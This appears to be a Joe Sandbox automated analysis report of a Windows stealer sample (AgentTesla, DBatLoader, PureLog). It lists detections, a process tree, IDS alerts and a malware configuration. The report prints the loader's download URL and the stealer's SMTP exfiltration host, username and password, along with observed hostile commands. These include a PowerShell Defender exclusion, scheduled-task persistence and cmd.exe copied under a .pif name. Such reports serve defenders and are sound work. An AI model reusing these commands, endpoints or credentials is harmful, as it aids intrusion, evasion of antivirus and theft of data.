Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
C6dAUcOA6M.exe

Overview

General Information

Sample name:C6dAUcOA6M.exe
renamed because original name is a hash value
Original sample name:0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb.exe
Analysis ID:1562865
MD5:53f0663219e6091cecd600c59389711f
SHA1:f1986a61c2cb0107444fbd3e8075a25e21fb26ca
SHA256:0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • C6dAUcOA6M.exe (PID: 7852 cmdline: "C:\Users\user\Desktop\C6dAUcOA6M.exe" MD5: 53F0663219E6091CECD600C59389711F)
    • cmd.exe (PID: 8080 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 8132 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8160 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 8188 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7376 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5844 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 5860 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 5076 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 4768 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2632 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 7228 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aymtmquJ.pif (PID: 7380 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 3976 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 2112 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
        • powershell.exe (PID: 7624 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 2596 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • schtasks.exe (PID: 7904 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • apihost.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: A89798786670C9BBB806311854859FF3)
  • alg.exe (PID: 6072 cmdline: C:\Windows\System32\alg.exe MD5: E471E4037B76A28D3D82E42538FC3807)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 1076 cmdline: C:\Windows\system32\AppVClient.exe MD5: 907DB1B5C7DE81B95CC62375B2502582)
  • FXSSVC.exe (PID: 3508 cmdline: C:\Windows\system32\fxssvc.exe MD5: BB9DE1AD24CC587EB4D9FB9CF61AE13B)
  • Juqmtmya.PIF (PID: 4460 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 4688 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 5088 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 4868 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • Juqmtmya.PIF (PID: 5836 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: 53F0663219E6091CECD600C59389711F)
    • aymtmquJ.pif (PID: 7404 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 7892 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 7024 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • maintenanceservice.exe (PID: 5616 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: C00D0B962E95984AE63736DD9A6F990E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000020.00000002.1821621079.0000000002A76000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000020.00000002.1846740962.0000000004F70000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000020.00000002.1832128642.0000000002E71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            32.2.Native_neworigin.exe.4f70000.7.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              13.0.Native_neworigin.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              13.2.Native_neworigin.exe.59e0000.8.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                13.2.Native_neworigin.exe.2b66216.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  13.2.Native_neworigin.exe.3f3c190.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    Click to see the 43 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\C6dAUcOA6M.exe, ProcessId: 7852, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                    Sigma detected: Execution from Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 8188, ProcessName: alpha.pif
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\C6dAUcOA6M.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7624, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\C6dAUcOA6M.exe, ProcessId: 7852, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8080, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 8188, ProcessName: alpha.pif
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7624, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 2112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7904, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 3976, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49774
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7904, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2112, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7624, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T08:12:12.573946+010020283713Unknown Traffic192.168.2.1049708198.252.105.91443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T08:12:41.335413+010020516491A Network Trojan was detected192.168.2.10550121.1.1.153UDP
                    2024-11-26T08:12:47.189936+010020516491A Network Trojan was detected192.168.2.10529031.1.1.153UDP
                    2024-11-26T08:13:10.876049+010020516491A Network Trojan was detected192.168.2.10642551.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T08:12:37.384307+010020516481A Network Trojan was detected192.168.2.10540941.1.1.153UDP
                    2024-11-26T08:12:40.975891+010020516481A Network Trojan was detected192.168.2.10559741.1.1.153UDP
                    2024-11-26T08:13:07.874186+010020516481A Network Trojan was detected192.168.2.10544981.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T08:12:28.611072+010020181411A Network Trojan was detected54.244.188.17780192.168.2.1049744TCP
                    2024-11-26T08:12:32.627342+010020181411A Network Trojan was detected18.141.10.10780192.168.2.1049757TCP
                    2024-11-26T08:12:37.495356+010020181411A Network Trojan was detected44.221.84.10580192.168.2.1049773TCP
                    2024-11-26T08:14:39.886220+010020181411A Network Trojan was detected34.246.200.16080192.168.2.1050015TCP
                    2024-11-26T08:14:41.732453+010020181411A Network Trojan was detected18.208.156.24880192.168.2.1050017TCP
                    2024-11-26T08:14:42.324768+010020181411A Network Trojan was detected47.129.31.21280192.168.2.1050016TCP
                    2024-11-26T08:14:44.673882+010020181411A Network Trojan was detected13.251.16.15080192.168.2.1050018TCP
                    2024-11-26T08:14:53.634411+010020181411A Network Trojan was detected35.164.78.20080192.168.2.1050029TCP
                    2024-11-26T08:14:55.447711+010020181411A Network Trojan was detected3.94.10.3480192.168.2.1050031TCP
                    2024-11-26T08:15:39.125752+010020181411A Network Trojan was detected18.246.231.12080192.168.2.1050077TCP
                    2024-11-26T08:15:41.242825+010020181411A Network Trojan was detected3.254.94.18580192.168.2.1050078TCP
                    2024-11-26T08:15:48.948405+010020181411A Network Trojan was detected34.211.97.4580192.168.2.1050086TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T08:12:28.611072+010020377711A Network Trojan was detected54.244.188.17780192.168.2.1049744TCP
                    2024-11-26T08:12:32.627342+010020377711A Network Trojan was detected18.141.10.10780192.168.2.1049757TCP
                    2024-11-26T08:12:37.495356+010020377711A Network Trojan was detected44.221.84.10580192.168.2.1049773TCP
                    2024-11-26T08:14:39.886220+010020377711A Network Trojan was detected34.246.200.16080192.168.2.1050015TCP
                    2024-11-26T08:14:41.732453+010020377711A Network Trojan was detected18.208.156.24880192.168.2.1050017TCP
                    2024-11-26T08:14:42.324768+010020377711A Network Trojan was detected47.129.31.21280192.168.2.1050016TCP
                    2024-11-26T08:14:44.673882+010020377711A Network Trojan was detected13.251.16.15080192.168.2.1050018TCP
                    2024-11-26T08:14:53.634411+010020377711A Network Trojan was detected35.164.78.20080192.168.2.1050029TCP
                    2024-11-26T08:14:55.447711+010020377711A Network Trojan was detected3.94.10.3480192.168.2.1050031TCP
                    2024-11-26T08:15:39.125752+010020377711A Network Trojan was detected18.246.231.12080192.168.2.1050077TCP
                    2024-11-26T08:15:41.242825+010020377711A Network Trojan was detected3.254.94.18580192.168.2.1050078TCP
                    2024-11-26T08:15:48.948405+010020377711A Network Trojan was detected34.211.97.4580192.168.2.1050086TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-26T08:12:31.363417+010028508511Malware Command and Control Activity Detected192.168.2.104975354.244.188.17780TCP
                    2024-11-26T08:13:32.576759+010028508511Malware Command and Control Activity Detected192.168.2.104986782.112.184.19780TCP
                    2024-11-26T08:14:33.633509+010028508511Malware Command and Control Activity Detected192.168.2.105001218.141.10.10780TCP
                    2024-11-26T08:15:39.005596+010028508511Malware Command and Control Activity Detected192.168.2.105007718.246.231.12080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
